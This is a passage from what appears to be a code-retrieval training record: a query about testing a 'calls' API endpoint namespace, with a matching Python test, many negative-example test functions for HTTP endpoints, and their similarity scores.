f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n expected_url = f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service'\n assert responses.calls[0].request.url == expected_url\n assert \"MY-SERVICE-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def test_get_request_success_json_data(self, mock_get):\n\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({\"msg\": \"success\"}, 200)\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_request_data(self.url)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance.json())", "def test_app(self):\n response = self.client.get('/')\n data = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertIn('pong!', data['message'])\n self.assertIn('success', data['status'])", "def test_get_method(self):\n self.getPage('/')\n self.assertStatus('200 OK')\n self.assertHeader('Content-Type', 'application/json')\n self.assertBody('{\"mystring\": \"\"}')", "def test_simple_request(self):\n urls = [\"https://api.omniture.com/admin/1.4/rest/\",\n \"https://api2.omniture.com/admin/1.4/rest/\",\n \"https://api3.omniture.com/admin/1.4/rest/\",\n \"https://api4.omniture.com/admin/1.4/rest/\",\n \"https://api5.omniture.com/admin/1.4/rest/\"]\n self.assertIn(self.analytics.request('Company', 'GetEndpoint'),urls, \"Company.GetEndpoint failed\" )", "def test_health_endpoint(self):\n url = f\"{BASE_URL}/health\"\n response = requests.get(url)\n response_json = response.json()\n assert response.status_code == 200\n assert response_json['status'] == 200", "def test_ready(client):\n response = client.get('/api/ready')\n assert response.json == \"Ready\" \n assert response.status_code == 200", "def test_00_api_get(self):\r\n # GET as Anonymous\r\n url = '/api/'\r\n action = 'get'\r\n self.check_limit(url, action, 'app')", "def test_get_injuries(self):\n msg = \"Response status is not 200\"\n response = self.api.get_injuries()\n self.assertEqual(response.status_code, 200, msg)", "def test_ping(self):\n response = self.client.get(reverse(\"api_hello:ping\"))\n self.assertTrue(response.json()[\"status\"])", "def test_http_request(self):\n\n response = requests.get(self.live_server_url)\n assert response.status_code == 200", "def test_request_ok(self, method, m_requests):\n # Dummy values for the K8s API request.\n url = 'http://examples.com/'\n client = k8s.requests.Session()\n headers = {\"some\": \"headers\"}\n payload = {\"some\": \"payload\"}\n response = {\"some\": \"response\"}\n\n # Verify the makeup of the actual request.\n def additional_matcher(req):\n assert req.method == method\n assert req.url == url\n assert req.json() == payload\n assert req.headers[\"some\"] == headers[\"some\"]\n assert req.timeout == 30\n return True\n\n # Assign a random HTTP status code.\n status_code = random.randint(100, 510)\n m_requests.request(\n method,\n url,\n json=response,\n status_code=status_code,\n additional_matcher=additional_matcher,\n )\n\n # Verify that the function makes the correct request and returns the\n # expected result and HTTP status code.\n ret = k8s.request(client, method, url, payload, headers)\n assert ret 
== (response, status_code)", "async def test_get_booking(client):\n headers = { \n 'Accept': 'application/json',\n 'Authorization': 'Bearer special-key',\n }\n response = await client.request(\n method='GET',\n path='/vms/api/v1/bookings/{booking_id}'.format(booking_id='booking_id_example'),\n headers=headers,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_resourcenotfound():\n\n URL_STR = \"http://52.24.157.193:5000/api/fibonacci/foo\"\n response = requests.get( URL_STR )\n data = response.json()\n assert response.status_code == 404", "def test_trucks_api_error(self):\n resp = self.app.get('/asfdasdf')\n self.assertEqual(resp.status_code, 404)\n assert \"NOT FOUND\" in resp.status", "def api_call():\n\tresponse = requests.get(URL_API)\n\treturn response", "def test_api(test_name, endpoint, method, body, expected_response, expected_status_code, validation, params):\n response = None\n with allure.step(' '.join(['getting API response on endpoint:', str(endpoint)])):\n response = APIRequestor().request(method=method, url_path=endpoint, body=body, params=params)\n with allure.step(' '.join(['Asserting API status code expected:', str(expected_status_code), ', with response:', str(response.status_code)])):\n Compare.equal.__call__(a=expected_status_code, b=response.status_code, free_text=f\"Status code is not as expected: {response.status_code} instead of expected: {expected_status_code}\")\n with allure.step('starting API validation'):\n validation = 'equal' if not validation else validation\n with allure.step(' '.join(['Validation with method:', str(validation)])):\n Compare.__dict__[validation](a=str(response), b=str(expected_response),\n free_text=f\"Failed to compare, Response is not as expected: {response} instead of {expected_response}\")", "def test_profile_api_get(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 200)", "def test_request_response():\n response = get_todos()\n assert response is not None", "async def test_api_status(hass: HomeAssistant, mock_api_client: TestClient) -> None:\n resp = await mock_api_client.get(\"/api/\")\n assert resp.status == HTTPStatus.OK\n json = await resp.json()\n assert json[\"message\"] == \"API running.\"", "def test_GET4(self):\n r = requests.get(self.address + \"/carcar/23\")\n self.assertEqual(r.status_code, 400)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 
200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n response = self.client.get(self.get_url())\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n tmp = self.get_url()\n response = self.client.get(tmp)\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n tmp = self.get_url()\n response = self.client.get(tmp)\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n tmp = self.get_url()\n response = self.client.get(tmp)\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n tmp = self.get_url()\n response = self.client.get(tmp)\n self.assertEqual(response.status_code, 200)", "def test_view_success_code(self):\n tmp = self.get_url()\n response = self.client.get(tmp)\n self.assertEqual(response.status_code, 200)", "def test_open_api(self):\n response = self.client.get(self.initiatives_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def test_api_response_data(self):", "def test_index(self):\n resp = self.app.get('/')\n self.assertEqual(resp.status_code, status.HTTP_200_OK)\n self.assertIn('Inventory Demo REST API Service', resp.data)\n # resp = self.app.get('/')\n # self.assertEqual(resp.status_code, status.HTTP_200_OK)\n # data = json.loads(resp.data)\n # self.assertEqual(data['name'], 'Inventory Demo REST API Service')", "def test_api_ping_success(self):\r\n res = self.testapp.get('/api/v1/admin/ping?api_key=' + API_KEY,\r\n status=200)\r\n ping = json.loads(res.body)\r\n\r\n self.assertTrue(ping['success'])\r\n\r\n self._check_cors_headers(res)", "def test_request_users_user(self):\n response = requests.get(self.url + '/users/John')\n\n self.assertEqual(response.status_code, 200)\n self.assertIsNone(response.json())" ]
[ "0.7947968", "0.7947968", "0.7879138", "0.77913356", "0.77913356", "0.77886796", "0.76140255", "0.75884384", "0.7562267", "0.75419384", "0.75371504", "0.75371504", "0.7369333", "0.7351754", "0.7339209", "0.73001033", "0.72693115", "0.7259427", "0.72563964", "0.721277", "0.7197149", "0.7195686", "0.7183881", "0.7172894", "0.71702355", "0.7159556", "0.71461135", "0.71298665", "0.712279", "0.71111274", "0.7103449", "0.70962155", "0.70949024", "0.70797604", "0.7077542", "0.706866", "0.7059295", "0.7049227", "0.7038257", "0.70377374", "0.70194644", "0.7014586", "0.69977385", "0.69856936", "0.6977616", "0.6958035", "0.69572264", "0.69558394", "0.69535625", "0.69438034", "0.6901962", "0.6895813", "0.68907535", "0.6888978", "0.68757", "0.68717796", "0.6862393", "0.6848112", "0.6846643", "0.68444765", "0.68403125", "0.68285054", "0.6820725", "0.6811993", "0.68114346", "0.68107563", "0.68090415", "0.6789841", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67791754", "0.67733514", "0.67733514", "0.67733514", "0.67733514", "0.67733514", "0.6761728", "0.6760909", "0.6743141", "0.6742817", "0.6742001" ]
0.8886346
0
Test if there is a Call API endpoint and if it is defined under the "calls" namespace with "call-list" as its name
def test_namespace_of_call_api_endpoint(): url = '/api/v1/calls/' resolved = resolve(url) assert resolved.namespace == 'calls'\ and resolved.url_name == 'call-list'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n start_call_fx_2 = copy(start_call_fx)\n start_call_fx_2['call_id'] = 2\n\n post_data = [start_call_fx, start_call_fx_2, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1", "def endpoint_checker(url):\r\n if \"/arcgis/rest/services/\" and \"http\" in url:\r\n return True\r\n return False", "def isThereApiCalls(report):\n with open(report, \"rb\") as r:\n data = json.load(r)\n for i in range(numProcs(report)):\n if len(data[\"behavior\"][\"processes\"][i][\"calls\"]) > 0:\n return True\n else:\n continue\n return False", "def test_simple_request(self):\n urls = [\"https://api.omniture.com/admin/1.4/rest/\",\n \"https://api2.omniture.com/admin/1.4/rest/\",\n \"https://api3.omniture.com/admin/1.4/rest/\",\n \"https://api4.omniture.com/admin/1.4/rest/\",\n \"https://api5.omniture.com/admin/1.4/rest/\"]\n self.assertIn(self.analytics.request('Company', 'GetEndpoint'),urls, \"Company.GetEndpoint failed\" )", "def test_all_endpoint_status():\n r = client.get('/openapi.json')\n assert r.status_code == 200\n for e in r.json()['paths'].keys():\n r = client.get(e)\n assert r.status_code == 200\n\n for e in ['plot']:\n r = client.get(e)\n assert r.status_code == 200", "def test_services_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_service_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service',\n json=expected_response,\n status=200\n )\n resp = requests.get(\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n expected_url = f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service'\n assert responses.calls[0].request.url == expected_url\n assert \"MY-SERVICE-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def isCall(self) -> bool:\n ...", "def test_GET_call_api_and_return_200Ok(client):\n\n url = '/api/v1/calls/'\n\n response = client.get(url)\n\n assert response.status_code == status.HTTP_200_OK", "def test_calls_in_list_with_names_only(self):\n some_calls = [Call(\"one\"), Call(\"two\")]\n assert_that(some_calls, has_item(Call(\"one\")))\n assert_that(some_calls, has_item(Call(\"two\")))\n assert_that(some_calls, is_not(has_item(Call(\"three\"))))", "def _test_single_prerecorded_api_call(app, path, prerecorded, contexts={}):\n rv = app.get(path)\n assert rv.status_code == 200\n response = json.loads(rv.get_data().decode('utf8'))\n if type(prerecorded) is list:\n response = response['items']\n compare_objects(contexts, '', prerecorded, response)\n return False", "def test_list_namespaced_route(self):\n pass", "def test_list_endpoints(self):\n routes = [\n '/',\n '/npm/<name>',\n '/nuget/<name>',\n '/ping',\n '/ping/npm',\n '/ping/nuget',\n '/ping/pypi',\n '/ping/rubygems',\n '/pypi/<name>',\n '/rubygems/<name>',\n ]\n expected = {}\n for num, route in enumerate(routes):\n expected[str(num)] = route\n\n response = self.app.get('/')\n assert 
json.loads(response.data) == expected", "def __nonzero__(self):\n return self.has_apicalls", "def valid_endpoint(cls):\n\t\treturn cls.__subclasses__() == []", "def check_endpoint_in_paths(context, endpoint):\n data = context.response.json()\n paths = check_and_get_attribute(data, \"paths\")\n assert endpoint in paths, \"Cannot find the expected endpoint {e}\".format(\n e=endpoint)", "def is_incall_dialing(self) -> bool:", "def _api_call(self, url, response_checker):\n self.request_compare(url)", "def test_list_net_namespace(self):\n pass", "def test_if_app_gets_shoppinglists(self):\n li = self.client.get('/shoppinglists/?each_page=1&page_number=1',\n headers = {\n 'Content-Type':'application/json',\n 'x-access-token':self.tok})\n self.assertEqual(li.status_code, 200)", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def call_status():\n\n if 'mocean-call-uuid' in request.form:\n call_uuid = request.form.get('mocean-call-uuid')\n logging.info(f'### Call status received [{call_uuid}] ###')\n for k, v in request.form.items():\n logging.info(f'\\t{k}:{v}')\n\n if request.form.get('mocean-call-uuid') in calls \\\n and request.form.get('mocean-status') == 'HANGUP':\n logging.debug(f'Deleting call-uuid[{call_uuid}] from calls dict')\n del calls[call_uuid]\n call_ended.append(call_uuid)\n return Response('', status=204, mimetype='text/plain')\n else:\n return invalid_response()", "def is_incall_connected(self) -> bool:", "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def check_schema_existence_api_call(context, schema, version):\n check_schema_existence(context, schema, version, \"api\")", "def check_api(self):\n catalog = self.service_catalog\n for service in catalog:\n if service['name'] not in self.RESOURCE_MAP:\n self.logger.notice(\"Don't know how to check service '%s'\" %\n service['name'])\n status = self.UNKNOWN\n else:\n r = self.get(service['name'],\n self.RESOURCE_MAP[service['name']])\n if not r or r.status_code < 200 or r.status_code > 299:\n status = self.FAIL\n else:\n status = self.OK\n\n yield {\n 'service': service['name'],\n 'status': status,\n 'region': service['region']\n }", "def test_request(self):\n self.assertIn('list', self.api.request('sys.settings.get').data,\n msg=\"request() doesn't work properly. 
'list' is not found in the response\")", "def test_documentation_for_call_view():\n\n url = reverse_lazy('calls:call-list')\n view = resolve(url).func\n\n assert view.__doc__", "def test_application_rules(self, mocked_get, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with aplpication name\n self.assertDictEqual(rpc.get_application_rules('appli'), \n {'application_name': 'appli','start': 1, 'stop': 2, 'required': True})\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli')], mocked_get.call_args_list)", "def _api_query(\n self,\n endpoint: Literal[\n 'configs_list_currency',\n 'configs_list_pair_exchange',\n 'configs_map_currency_symbol',\n 'movements',\n 'trades',\n 'wallets',\n ],\n options: Optional[dict[str, Any]] = None,\n ) -> Response:\n call_options = options.copy() if options else {}\n for header in ('Content-Type', 'bfx-nonce', 'bfx-signature'):\n self.session.headers.pop(header, None)\n\n if endpoint == 'configs_list_currency':\n method = 'get'\n api_path = 'v2/conf/pub:list:currency'\n request_url = f'{self.base_uri}/{api_path}'\n elif endpoint == 'configs_list_pair_exchange':\n method = 'get'\n api_path = 'v2/conf/pub:list:pair:exchange'\n request_url = f'{self.base_uri}/{api_path}'\n elif endpoint == 'configs_map_currency_symbol':\n method = 'get'\n api_path = 'v2/conf/pub:map:currency:sym'\n request_url = f'{self.base_uri}/{api_path}'\n elif endpoint == 'movements':\n method = 'post'\n api_path = 'v2/auth/r/movements/hist'\n request_url = f'{self.base_uri}/{api_path}?{urlencode(call_options)}'\n elif endpoint == 'trades':\n method = 'post'\n api_path = 'v2/auth/r/trades/hist'\n request_url = f'{self.base_uri}/{api_path}?{urlencode(call_options)}'\n elif endpoint == 'wallets':\n method = 'post'\n api_path = 'v2/auth/r/wallets'\n request_url = f'{self.base_uri}/{api_path}'\n else:\n raise AssertionError(f'Unexpected {self.name} endpoint type: {endpoint}')\n\n with self.nonce_lock:\n # Protect this region with a lock since Bitfinex will reject\n # non-increasing nonces for authenticated endpoints\n if endpoint in ('movements', 'trades', 'wallets'):\n nonce = str(ts_now_in_ms())\n message = f'/api/{api_path}{nonce}'\n signature = hmac.new(\n self.secret,\n msg=message.encode('utf-8'),\n digestmod=hashlib.sha384,\n ).hexdigest()\n self.session.headers.update({\n 'Content-Type': 'application/json',\n 'bfx-nonce': nonce,\n 'bfx-signature': signature,\n })\n\n log.debug(f'{self.name} API request', request_url=request_url)\n try:\n response = self.session.request(\n method=method,\n url=request_url,\n )\n except requests.exceptions.RequestException as e:\n raise RemoteError(\n f'{self.name} {method} request at {request_url} connection error: {e!s}.',\n ) from e\n\n return response", "def test_api_lookup(self):\n\n # Set up the url for the api call\n\n expected_url = 'https://www.gov.uk/api/content{}'.format(self.urlsclass.dedupurls[0])\n\n # Make request and extract json.\n\n expected = requests.get(expected_url).json()\n\n assert api_lookup(self.urlsclass.dedupurls[0], 'https://www.gov.uk/api/content') == expected", "def test_call(schemas, expected_calls):\n model_factory = mock.MagicMock()\n\n define_all.define_all(model_factory=model_factory, schemas=schemas)\n\n model_factory.assert_has_calls(\n list(mock.call(name=name) for name in expected_calls)\n )", "def test_list_route_for_all_namespaces(self):\n pass", "def _get_allowed_calls(self):\n 
return self.visa.calls", "def get_api_calls(api_functions=api_functions, ignore_unfound=False):\n functions = [(n,f) for (n,f) in api_functions if getattr(f, \"is_api\", False)]\n functions = sorted(functions, key=lambda (n,f): n)\n ret = []\n for function in functions:\n try:\n ret.append(APICall(function))\n except NoReverseMatch:\n if not ignore_unfound:\n raise\n return ret", "def test_1():\n\tassert api_call().status_code == 200", "def test_format_price_api_url_exists(self):\n self.assertIsNotNone(format_price_api_url)", "def test_read_namespaced_route_status(self):\n pass", "def calls_cmd(args):\n r = requete(\"VoiceService.VoiceApplication:getCallList\")\n if r is None or not 'status' in r:\n return\n\n r = r['status']\n if len(args) == 1 and args[0] == '?':\n return print(r[0].keys())\n\n for i in r:\n if len(args) > 0:\n print(i[args[0]])\n else:\n if i['callOrigin'] == 'local':\n arrow = '<=='\n else:\n arrow = '==>'\n print(\"{:>3} {} {:16} {} {} {:10}\".format(\n i['callId'],\n arrow,\n i['remoteNumber'] if i['remoteNumber'] != '' else '**********',\n parsedate.isoparse(i['startTime']).astimezone(tz.tzlocal()),\n str(datetime.timedelta(seconds=int(i['duration']))),\n i['callType']\n ))", "def test_list(self):\n response = self.client.get('/routines/')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['count'], 2)\n self.assertEqual(len(response.data['results']), 2)\n self.assertEqual(response.data['results'][0]['id'], self.rout1.id)", "def http_get(call):\n\n verify_ssl = (\n True if \"verify_ssl\" not in call.data.keys() else call.data[\"verify_ssl\"]\n )\n\n headers = basic_headers\n if \"headers\" in call.data.keys():\n headers.update(call.data[\"headers\"])\n\n auth = None\n if \"auth_username\" in call.data.keys() and \"auth_password\" in call.data.keys():\n auth = (\n call.data[\"auth_username\"]\n if \"auth_username\" in call.data.keys()\n else None,\n call.data[\"auth_password\"]\n if \"auth_password\" in call.data.keys()\n else None,\n )\n\n resp = requests.get(\n url=call.data[\"url\"],\n params=call.data[\"get_params\"]\n if \"get_params\" in call.data.keys()\n else None,\n headers=headers,\n verify=verify_ssl,\n timeout=10,\n auth=auth,\n )\n\n return resp.status_code == 200", "def test_mocked_get_list_template(self):\n c = Client()\n response = c.get(reverse('mocked'))\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"Here is the list of all possible apis:\",\n response.content)\n self.assertIn(\"^mocked_get$\", response.content)", "def test_beneficiaries_list_connectivity_that_will_pass(self):\n print('the test function name: {}'.format(sys._getframe().f_code.co_name))\n url = reverse('beneficiary:beneficiaries-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)", "def exists(self, name):\n return self.endpoint.exists(name)", "def test_get_api_resources(self):\n pass", "def testListEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Empty list\n status, response = self._http_get(\"/endpoints\")\n\n # Check result\n self.assertEqual(status, 200)\n self.assertListEqual(json.loads(response), [])\n\n # Register some endpoints\n svc_regs = []\n for _ in range(3):\n # Register a service\n svc_regs.append(\n context.register_service(\n \"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"}))\n\n # Request 
the list of endpoints\n status, response = self._http_get(\"/endpoints\")\n\n # Check result\n self.assertEqual(status, 200)\n\n # Get all endpoints ID\n data = json.loads(response)\n local_uids = [endpoint.uid for endpoint in exporter.endpoints]\n servlet_uids = [item['uid'] for item in data]\n\n self.assertCountEqual(servlet_uids, local_uids)\n\n # Unregister them\n for svc_reg in svc_regs:\n # Unregister the service\n svc_reg.unregister()\n\n # Request the list of endpoints\n status, response = self._http_get(\"/endpoints\")\n\n # Check result\n self.assertEqual(status, 200)\n\n # Get all endpoints ID\n data = json.loads(response)\n local_uids = [endpoint.uid for endpoint in exporter.endpoints]\n servlet_uids = [item['uid'] for item in data]\n\n self.assertCountEqual(servlet_uids, local_uids)", "def is_service_endpoint(path):\n return re.match(r'^[a-zA-Z0-9.-]+:\\d+$', path)", "def _call_endpoint(url_suffix: str, base_url: str = BASE_URL) -> dict:\n headers = _get_headers()\n url = os.path.join(base_url, url_suffix)\n resp = requests.get(url, headers=headers)\n return resp.json()", "def test_get_specific_contact_list(self):\n contact_list = ContactList.objects.first()\n url, parsed = self.prepare_urls('v1:contact_list-detail', subdomain=self.company.subdomain, kwargs={'pk':contact_list.id})\n\n response = self.client.get(url, HTTP_HOST=parsed.netloc)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n self.authenticate_user()\n response = self.client.get(url, HTTP_HOST=parsed.netloc)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def is_list_request(message):\n list_found = re.search(\"list\", message)\n\n return list_found is not None", "def have_api(self, *apis):\n if not all(apis):\n logger.log('DEBUG', f'{self.source} module is not configured')\n return False\n return True", "def testGetSeveralForOne(self):\n types = ['http://lid.netmesh.org/sso/2.0b5',\n 'http://lid.netmesh.org/2.0b5'\n ]\n\n reference_uri = \"http://mylid.net/josh\"\n\n for element in self._getServices():\n if xrds.getURI(element) == reference_uri and \\\n xrds.getTypeURIs(element) == types:\n break\n else:\n self.fail('Did not find service with expected types and uris')", "def apiName(self, name):\n return self.genOpts.conventions.is_api_name(name)", "def test_mocked_get_list_template(self):\n c = Client()\n response = c.get(reverse('mocked'))\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"Here is the list of all possible apis:\",\n response.content)\n self.assertIn(\"^mocked_post$\", response.content)", "def testEndpoint(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # With no UID given\n status, _ = self._http_get(\"/endpoint\")\n\n # Check result\n self.assertEqual(status, 404)\n\n # Register a service\n svc_reg = context.register_service(\n \"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Request the details of the endpoint\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 200)\n\n # Check the content\n data = json.loads(response)\n for key, attr in (('uid', 'uid'), ('sender', 'framework'),\n ('name', 'name')):\n self.assertEqual(data[key], getattr(endpoint, attr))\n\n # Unregister it\n svc_reg.unregister()\n\n # Request the list of 
endpoints\n status, _ = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 404)", "def rpc_match():", "def test_basic_api(self):\n self.create_and_verify_stack(\"single/basic_api\")\n\n first_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(first_dep_ids), 1)\n\n self.set_template_resource_property(\"MyApi\", \"DefinitionUri\", self.get_s3_uri(\"swagger2.json\"))\n self.update_stack()\n\n second_dep_ids = self.get_stack_deployment_ids()\n self.assertEqual(len(second_dep_ids), 1)\n\n self.assertEqual(len(set(first_dep_ids).intersection(second_dep_ids)), 0)", "def api_list(resource_name):\n if ':' in resource_name:\n api_name, resource_name = resource_name.split(':', 1)\n else:\n api_name = 'v1'\n return reverse('api_dispatch_list', kwargs={\n 'api_name': api_name,\n 'resource_name': resource_name,\n }) + '?format=json'", "def process_calls():\n try:\n sdplus_api = API(os.environ['SDPLUS_ADMIN'], 'http://sdplus/sdpapi/')\n if not sdplus_api:\n raise KeyError\n except KeyError:\n print('Windows environment varible for \"SDPLUS_ADMIN\" (the API key for sdplus) wasn\\'t found. \\n'\n 'Please correct using \"\"setx SDPLUS_ADMIN <insert your own SDPLUS key here>\" in a command line.')\n sys.exit(1)\n result = []\n all_queues = sdplus_api.request_get_requests('Back Office Third Party/CSC_QUEUE')\n for each_call in all_queues:\n conversations = sdplus_api.request_get_all_conversations(each_call['workorderid'])\n each_call['classification'] = classify_call(conversations)\n each_call['Others involved'] = find_all_people_involved(conversations, each_call['requester'])\n each_call['CSC open/reopen date'] = find_date_csc_opened_call(conversations)\n each_call['CSC severity'] = find_csc_severity(conversations)\n result.append(each_call)\n return result", "def test_read_namespaced_route(self):\n pass", "def test_view_url_exists_api_alerts(self):\n response = self.client.get('/api/alerts/')\n self.assertEqual(response.status_code, 200)", "def test_root_api(self):\n\n # GIVEN API\n\n # WHEN fetching available applications and models\n response = self.api.root_api()\n\n # THEN it should succeed\n self.assertTrue(response.success)\n\n # AND it should have valid data\n for item in response.data:\n self.assertEqual(len(item.keys()), 3)\n self.assertEqual(set(item.keys()), set(['model', 'actions', 'app_label']))\n\n # AND it contains also UI application models\n self.assertTrue(any('test' in d['app_label'] for d in response.data))\n\n # AND public applications are also available\n data = [item for item in response.data if item['app_label'] == 'admin']\n self.assertEqual(len(data), 1)\n self.assertEqual(data[0]['model'], None)\n self.assertEqual(len(data[0]['actions'].keys()), 2)", "def is_api_method(obj, name):\n try:\n method = getattr(obj, name)\n except AttributeError:\n return False\n return (ismethod(method) and hasattr(method, \"__api_call\"))", "def check_internal_api_for_subscription(namespace_user):\n plans = []\n if namespace_user.organization:\n query = organization_skus.get_org_subscriptions(namespace_user.id)\n org_subscriptions = list(query.dicts()) if query is not None else []\n for subscription in org_subscriptions:\n subscription_id = subscription[\"subscription_id\"]\n sku = marketplace_subscriptions.get_subscription_sku(subscription_id)\n plans.append(get_plan_using_rh_sku(sku))\n pass\n else:\n user_account_number = marketplace_users.get_account_number(namespace_user)\n if user_account_number:\n plans = 
